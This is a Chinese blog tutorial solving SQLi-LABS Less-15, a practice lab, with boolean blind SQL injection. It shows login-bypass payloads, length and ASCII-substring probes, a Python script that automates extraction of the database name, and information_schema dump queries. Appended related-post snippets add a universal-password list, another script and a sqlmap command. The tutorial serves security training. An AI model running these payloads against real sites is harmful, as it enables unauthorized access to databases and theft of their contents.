SQLi LABS Less 15 布尔盲注

原创 已于 2024-12-29 09:31:19 修改 · 2.1w 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #web安全

于 2021-06-21 22:47:48 首次发布
本文详细介绍了如何利用布尔盲注来解决单引号字符串型注入问题,通过判断注入点、确定数据库名长度及枚举字符,最终实现脱库。提供了Python自动化脚本,演示了从判断注入到脱库的完整过程。

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第十五是单引号字符串型注入,推荐使用布尔盲注。

一、功能分析

输入用户名和密码,后台接收参数查询数据库。

如果用户名和密码存在,页面提示登录成功。

如果用户名和密码不存在,页面提示登录失败。

二、思路分析

参数中添加引号,页面不显示数据库的报错信息,报错注入无法使用。

使用万能账号登录成功后,页面不会动态返回数据(返回写死的图片),无法使用联合注入。

登录成功和登录失败(或错误)对应两种不同的页面响应情况,可以使用报错注入。

三、解题步骤

方式一:布尔盲注

参考文章:布尔盲注使用详解,原理+步骤+实战教程

第一步、判断注入点

用户名输入:a' or 1 -- a

密码随便输入:1,页面正常显示(登录成功)

 用户名输入:a' or 0 -- a

密码随便输入:1,页面异常显示(登录失败)

由此可以判断,网站存在注入,注入点为单引号字符型注入。

第二步、判断长度

判断当前使用数据库名字的长度,是否大于1,用户名输入:

a' or length(
	(database())
) >1 -- a

 长度肯定大于1,页面正常显示(登录成功),确定payload可用。

依次递增长度进行测试,手动判断效率太低,稍后使用脚本自动化猜解。

第三步、枚举字符

截取当前使用数据库名字的第一个字符,并转换为ASCLL(方便脚本测试)。

判断字符的ASCLL码是否大于1,用户名输入:

a' or ascii(
	substr(
		(database())
	,1,1)
) >1 -- a

字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。

依次测试字符的ASCLL是否等于(32~126)。

测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。

脱库

Python自动化脚本如下,可按需修改:

import requests

# 网站路径
url = "http://c1f436ecda844ea09d8e3dc91476b913.app.mituan.zone/Less-15/"
# 判断长度的payload
payload_len = """a' or length(
	(database())
) ={n} -- a"""
# 枚举字符的payload
payload_str = """a' or ascii(
	substr(
		(database())
	,{l},1)
) ={n} -- a"""

# post请求参数
data= {
    "uname" : "a') or 1 -- a",
    "passwd" : "1",
    "submit" : "Submit"
}

# 判断长度
def getLen(payload_len):
    length = 1
    while True:
        # 修改请求参数
        data["uname"] = payload_len.format(n = length)
        response = requests.post(url=url, data=data)
        # 出现此内容为登录成功
        if '../images/flag.jpg' in response.text:
            print('测试成功,长度为:', length)
            return length;
        else:
            print('正在测试长度:', length)
            length += 1


# 枚举字符
def getStr(length):
    str = ''
    # 从第一个字符开始截取
    for l in range(1, length+1):
        # 枚举字符的每一种可能性
        for n in range(32, 126):
            data["uname"] = payload_str.format(l=l, n=n)
            response = requests.post(url=url, data=data)
            if '../images/flag.jpg' in response.text:
                str += chr(n)
                print('第', l, '个字符枚举成功:',str )
                break

length = getLen(payload_len)
getStr(length)

执行结果如下:

其余脱库操作时,将下面圈起来的部分替换成SQL语句即可:

 

 常用的脱库语句:

# 获取所有数据库
select group_concat(schema_name)
from information_schema.schemata
 
# 获取 security 库的所有表
select group_concat(table_name)
from information_schema.tables
where table_schema="security"
 
# 获取 users 表的所有字段
select group_concat(column_name)
from information_schema.columns
where table_schema="security" and table_name="users"

sqli-labs靶场Less-15
songling515010475的专栏
08-26 377
1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入 分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。 2、使用盲注获取数据库长度 -- 盲注 admin' and length(databa...
SQL注入实例(sqli-labs/less-15
Thewei666的博客
08-08 322
确定符号的闭合。
SQLI-LABS 第十五关通关教程
最新发布
m0_75169999的博客
07-13 257
SQLI-LABS15关通关教程 less-15
生命在于折腾——SQL注入的实操(三)less11-15
易水哲的博客
08-20 778
本篇文章是sql-lib的11-15关。
SQLi LABS Less 15 布尔盲注_sqli-labs 15 为何 要输入 用户名(1)
2401_84264727的博客
05-17 858
朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~使用万能账号登录成功后,页面不会动态返回数据(返回写死的图片),无法使用联合注入。字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。长度肯定大于1,页面正常显示(登录成功),确定payload可用。参数中添加引号,页面不显示数据库的报错信息,报错注入无法使用。
Sqlilabs Less-15
Light_inthe_eyes的博客
03-07 226
判断是单引号字符型注入: uname=admin'#&passwd=&submit=Submit 判断列数: uname=admin'+order+by+2#&passwd=&submit=Submit
SQLi LABS Less-7 布尔盲注_sqli靶场第七关使用盲注(1)
2301_82056337的博客
05-17 566
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’)) and 0 – a,页面异常(空)显示。id=1’)) and 1 – a,页面正常显示。判断成立,页面正常显示,文末使用Python脚本自动化判断。判断成立,页面正常显示,文末使用Python脚本自动化判断。获取 security 库的所有表。获取 users 表的所有字段。因篇幅有限,仅展示部分资料。
Sqli-labs-master靶场--布尔盲注
ningwangh的博客
08-05 1078
布尔盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面,布尔盲注通常是由于开发者将报错信息屏蔽而导致的,但是网页中真和假有着不同的回显,比如为真时返回access,为假时返回false;如上图所示,如果数据库名的第一个字符的ascii码值等于97,则页面显示正确的页面,如果数据库名的第一个字符的ascii码值不等于97,则页面显示错误的页面,可以通过这种方式获取到数据库名,但效率过于低下,所以我们使用脚本来获取数据库名。id=1' 后,显示与上方不同,存在注入点。
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 825
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
sqli-labs第八关(布尔盲注
qq_42266432的博客
08-19 1718
第八关看标题可知此关可以使用布尔盲注布尔盲注我的理解是页面不会回显错误,但是注入等式或不等式时通过页面的反应能判断出注入中算式的true或false 布尔盲注的步骤如下: 获取数据库长度 获取数据库名 获取数据库表 获取表中字段 获取表中数据 先拿获取数据库长度举例 可以看到在length(database())>7时页面正常,length(database())>8时页面异常,即8>7=true,8>8=false,所以数据库名长度为8 再比如获取表名: 同理,sub
SQL注入——布尔盲注和时间盲注
m0_69151365的博客
02-16 1072
在这两种注入方法里我们可以发现布尔盲注和时间盲注的区别只是在与判断命令是否执行成功的条件不同,整体思路是一样的,包括在第10关中,判断条件变成了图片,而我们只需要在脚本中更改相应的判断条件即可,sqlmap工具同样可以使用。整体来说盲注都是一样的,不一样的只是判断语句是否执行成功的条件而已。
sqli-labs/Less-15
m0_71299382的博客
11-18 630
sqli-labs第十五关
sqli-labs (less-15)
kukudeshuo的博客
03-09 499
sqli-labs (less-15) 进入15关,输入用户名和密码,登入后发现没有数据返回 输入 uname=admin'&passwd=admin&submit=Submit #没有错误显示 uname=admin"&passwd=admin&submit=Submit #没有错误显示 这里我们发现我们不管我们输入什么都是没有错误信息显示的,这里我们可以使用时间盲注的方法判断注入点 uname=admin' and sleep(5)#&passwd=admi
sqli-labsless-15
羽的博客
08-29 265
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
[SQLi-LABS] Less-15
Stan冲冲冲
05-12 268
布尔盲注或时间盲注,这里用了布尔 'or 1=1# 'or (length(database()))>0 # 'or substr((select database()),1,1)="s" # //爆库 'or substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)="e" # /报表 'or substr((select gro
Sqli-labsLess-15Less-16
m0_46315342的博客
06-04 556
                                          &nbs...
sqli-labs (less15-less16)
Xi4or0uji
07-31 1183
less 15 post方法单引号时间盲注 这关跟之前的get方法的盲注差不多,具体就不多解释了,因为后台的查询语句是select xxx from "table_name" where uname='$_POST["uname"]' and passwd='$_POST["passwd"]' 所以只要构造uname=admin'绕过就行了 贴个爆数据库的脚本,其他的改下sql语句就能用了...
网络安全sqli-labs Less-15 解题详析
等风来
07-24 4202
本文介绍了基于时间注入的SQL盲注技术。通过sleep()函数判断注入类型为单引号字符型查询,逐步注入获取数据库信息:首先确定库名长度为8,逐字符获取库名"security";然后查得4个表名,如"emails"表;接着获取表列名及数据。通过延迟响应判断ASCII值,最终可获取全部字段内容。该技术适用于无显错回显场景下的数据库信息探测。
sqli-labs-Less-15 时间盲注
feng的博客
09-24 659
sqli-labs的这几题是post注入,之前的几天用万能密码都可以过,但是这题用了各种方式都没回显,因此判断是时间盲注。 关于万能密码,这里引用一下郁离歌大佬的: 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'O
sqli-labs通关less5布尔盲注
03-18
### SQLi-Labs Less-5 布尔盲注解法 布尔盲注是一种通过观察页面返回的不同状态来推断数据库信息的技术。在 SQLi-LabsLess-5 中,目标是利用布尔盲注技术获取当前使用的数据库名称。 #### 利用 ASCII 和 SUBSTR 函数实现布尔盲注 为了逐位猜解数据库名,可以使用 `ascii()` 和 `substr()` 函数组合。`ascii()` 返回字符串中指定位置字符的 ASCII 编码值,而 `substr()` 提取字符串中的子串[^4]。例如: ```sql ?id=1" AND ascii(substr(database(), 1, 1)) > 97 -- a ``` 上述语句的作用是从 `database()` 获取的第一个字符的 ASCII 值,并判断其是否大于 97。如果条件成立,则页面正常显示;否则会触发错误或其他异常行为。 #### 自动化脚本辅助猜测 手动测试可能较为繁琐,因此可以通过编写简单的 Python 脚本来自动化这一过程。以下是基于 requests 库的一个简单示例代码片段: ```python import string import requests url = "http://192.168.33.1/sqli/Less-5/" true_condition_response_length = len(requests.get(url).text) def check_payload(payload): response = requests.get(f"{url}?id={payload}") return len(response.text) != true_condition_response_length db_name = "" for i in range(1, 20): # 尝试读取前20个字符 found_char = False for char in (string.ascii_lowercase + string.digits): payload = f'1" AND ascii(substr(database(),{i},1))={ord(char)}--' if not check_payload(payload): db_name += char print(f"[+] Current DB Name: {db_name}") found_char = True break if not found_char: break print(f"\n[*] Final Database Name: {db_name}") ``` 此脚本尝试逐一匹配数据库名字母或数字部分,直到无法找到有效字符为止。 #### 使用 SqlMap 工具快速验证漏洞 对于更高效的渗透测试场景下,推荐直接调用 SqlMap 进行扫描。SqlMap 是一款功能强大的开源工具,能够自动检测并利用多种类型的 SQL 注入漏洞。针对 Less-5 关卡的具体命令如下所示[^3]: ```bash python sqlmap.py -u "http://192.168.33.1/sqli/Less-5/?id=1" --batch --technique=B --level=5 --risk=3 ``` 其中参数解释: - `-u`: 指定目标 URL 地址; - `--batch`: 避免交互模式运行; - `--technique=B`: 明确仅采用布尔型注入方式; - `--level/--risk`: 设置探测强度等级。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值